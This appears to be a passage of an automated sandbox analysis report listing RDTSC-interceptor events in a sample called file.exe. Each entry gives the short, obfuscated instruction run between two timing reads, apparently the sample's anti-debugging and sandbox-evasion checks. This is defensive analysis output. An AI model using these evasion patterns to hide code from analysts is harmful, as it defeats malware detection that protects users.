              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858F15 second address: 858F9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE8A0813DB0h 0x0000000b popad 0x0000000c push eax 0x0000000d jns 00007FE8A0813DB2h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FE8A0813DA8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e jng 00007FE8A0813DACh 0x00000034 add dword ptr [ebp+1245012Bh], ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007FE8A0813DA8h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 push 00000000h 0x00000058 mov dword ptr [ebp+122D29FCh], ecx 0x0000005e xchg eax, esi 0x0000005f jl 00007FE8A0813DB0h 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85831F second address: 858325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858F9C second address: 858FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 jp 00007FE8A0813DB0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858325 second address: 858336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 js 00007FE8A076DDD8h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858336 second address: 85833A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85833A second address: 85833E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B138 second address: 85B13E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B13E second address: 85B1A0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE8A076DDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FE8A076DDC8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D204Bh], esi 0x0000002d pushad 0x0000002e mov bx, E642h 0x00000032 jmp 00007FE8A076DDD0h 0x00000037 popad 0x00000038 push 00000000h 0x0000003a add ebx, 46B0DB62h 0x00000040 push 00000000h 0x00000042 clc 0x00000043 xchg eax, esi 0x00000044 je 00007FE8A076DDD4h 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B1A0 second address: 85B1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE8A0813DA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B3C4 second address: 85B3CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FE8A076DDC6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8623DC second address: 8623E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDC68 second address: 7FDC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE8A076DDC6h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863A90 second address: 863A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863A96 second address: 863ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A076DDD2h 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE8A076DDCFh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863ABF second address: 863AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DB0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC1D2 second address: 7FC1D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC1D6 second address: 7FC1FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DB5h 0x00000007 jns 00007FE8A0813DA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007FE8A0813DA6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC1FD second address: 7FC217 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC217 second address: 7FC21D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866A4B second address: 866A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE8A076DDC6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866BB3 second address: 866BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866D38 second address: 866D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 js 00007FE8A076DDD9h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FE8A076DDD1h 0x00000014 pushad 0x00000015 jmp 00007FE8A076DDD9h 0x0000001a jmp 00007FE8A076DDD5h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847A96 second address: 847A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847A9A second address: 847A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8750BD second address: 8750D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DB3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8750D6 second address: 8750DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874708 second address: 87470C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874F7A second address: 874F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874F80 second address: 874F86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87985E second address: 879889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FE8A076DDCAh 0x0000000a jnl 00007FE8A076DDC6h 0x00000010 jnp 00007FE8A076DDC6h 0x00000016 popad 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b pop edx 0x0000001c pop eax 0x0000001d jnp 00007FE8A076DDD0h 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879E2D second address: 879E36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87941A second address: 87941E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87941E second address: 87944E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FE8A0813DB7h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87944E second address: 879453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879453 second address: 879458 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879458 second address: 879466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A17F second address: 87A19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FE8A0813DB1h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A19A second address: 87A1A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A320 second address: 87A324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83FCC1 second address: 83FD43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FE8A076DDD6h 0x00000011 jnl 00007FE8A076DDC8h 0x00000017 popad 0x00000018 nop 0x00000019 pushad 0x0000001a mov ecx, dword ptr [ebp+122D3538h] 0x00000020 xor bl, FFFFFFE6h 0x00000023 popad 0x00000024 lea eax, dword ptr [ebp+12483A65h] 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007FE8A076DDC8h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 push eax 0x00000045 pushad 0x00000046 jmp 00007FE8A076DDD7h 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83FD43 second address: 82732A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE8A0813DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FE8A0813DA8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 call dword ptr [ebp+122D1F2Fh] 0x0000002e pushad 0x0000002f jbe 00007FE8A0813DB4h 0x00000035 jmp 00007FE8A0813DAEh 0x0000003a pushad 0x0000003b push esi 0x0000003c pop esi 0x0000003d push edx 0x0000003e pop edx 0x0000003f popad 0x00000040 popad 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83FEB5 second address: 83FEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8402BB second address: 8402C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE8A0813DA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840581 second address: 84058B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE8A076DDCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84068E second address: 840692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840692 second address: 8406AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FE8A076DDC6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e je 00007FE8A076DDC8h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840EC1 second address: 840ECB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE8A0813DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840ECB second address: 840ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8011A3 second address: 8011BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FE8A0813DA6h 0x00000013 jns 00007FE8A0813DA6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8011BC second address: 8011C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E2B5 second address: 87E2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E2B9 second address: 87E300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FE8A076DDCCh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007FE8A076DDDDh 0x00000018 jmp 00007FE8A076DDD1h 0x0000001d jno 00007FE8A076DDC6h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E300 second address: 87E31B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE8A0813DA6h 0x00000008 jmp 00007FE8A0813DB1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E494 second address: 87E49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E49B second address: 87E4A5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE8A0813DB2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882C38 second address: 882C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A076DDD1h 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B351 second address: 88B363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE8A0813DACh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B93B second address: 88B940 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B940 second address: 88B948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88BD73 second address: 88BD77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C1DB second address: 88C1E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C1E1 second address: 88C1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C1E5 second address: 88C205 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE8A0813DA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE8A0813DADh 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C205 second address: 88C219 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE8A076DDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FE8A076DDC6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C219 second address: 88C21D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C343 second address: 88C35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A076DDD1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891842 second address: 891849 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89876F second address: 898773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898773 second address: 898777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89713D second address: 897148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FE8A076DDC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89744B second address: 89746C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE8A0813DB6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89781B second address: 897827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897827 second address: 897842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE8A0813DACh 0x0000000e jne 00007FE8A0813DA6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897842 second address: 897848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840987 second address: 8409B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE8A0813DB6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8409B3 second address: 840A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE8A076DDD1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov edx, 0F25895Ah 0x00000013 mov ebx, dword ptr [ebp+12483AA4h] 0x00000019 mov dword ptr [ebp+122D18DCh], edx 0x0000001f add eax, ebx 0x00000021 push ebx 0x00000022 mov ecx, dword ptr [ebp+122D35B2h] 0x00000028 pop edx 0x00000029 mov dword ptr [ebp+122D2AB9h], esi 0x0000002f push eax 0x00000030 pushad 0x00000031 jns 00007FE8A076DDCCh 0x00000037 jmp 00007FE8A076DDCFh 0x0000003c popad 0x0000003d mov dword ptr [esp], eax 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007FE8A076DDC8h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a mov edi, dword ptr [ebp+122D35DFh] 0x00000060 push 00000004h 0x00000062 nop 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FE8A076DDD4h 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840A4E second address: 840A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FE8A0813DA8h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840A71 second address: 840A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8979D1 second address: 8979D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D344 second address: 89D34A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C84B second address: 89C851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C851 second address: 89C855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C991 second address: 89C997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C997 second address: 89C9BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FE8A076DDD0h 0x00000008 jmp 00007FE8A076DDCCh 0x0000000d pop edi 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89CDC0 second address: 89CDD8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FE8A0813DB1h 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89CF1E second address: 89CF24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A10A2 second address: 8A10DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE8A0813DADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007FE8A0813DBDh 0x00000011 pushad 0x00000012 jnp 00007FE8A0813DA6h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A10DD second address: 8A10EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FE8A076DDD2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
